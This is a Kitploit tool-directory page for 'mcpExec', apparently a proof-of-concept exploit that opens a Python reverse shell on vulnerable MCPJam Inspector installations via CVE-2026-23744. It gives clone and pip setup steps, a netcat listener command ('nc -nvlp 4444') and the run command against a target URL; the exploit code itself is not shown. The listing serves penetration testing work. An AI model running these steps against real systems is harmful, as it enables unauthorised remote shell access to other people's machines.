Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
mcpExec — POC for CVE-2026-23744 for a python revshell | Kitploit
Tools/GitHubGitHub/daemoncibsec/mcpexec
Payload GenerationExploitationWeb Application ExploitationPenetration TestingCommand and ControlRemote Access Tool
GitHubdaemoncibsec/mcpexec

mcpExec

POC for CVE-2026-23744 for a python revshell

View Repository
4 days agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

crtfindr

mcpExec is a tool that takes advantage of the CVE-2026-23744 to gather a reverse shell using the URL of the vulnerable MCPJam Inspector installation.

Installation

root@kitploit:~
git clone https://github.com/daemoncibsec/mcpExec.git
cd mcpExec
python3 -m venv venv
source venv/bin/activate
pip install rich
pip install argparse
pip install requests
chmod +x mcpExec.py

To exit the venv:

root@kitploit:~
deactivate

Usage/Examples

Open a listener for the exploit to work:

root@kitploit:~
nc -nvlp 4444

This command will handle you the reverse shell (if the affected system has Python3 installed).

root@kitploit:~
./mcpExec.py http://localhost:6274

Authors

  • @daemoncibsec
Download Tool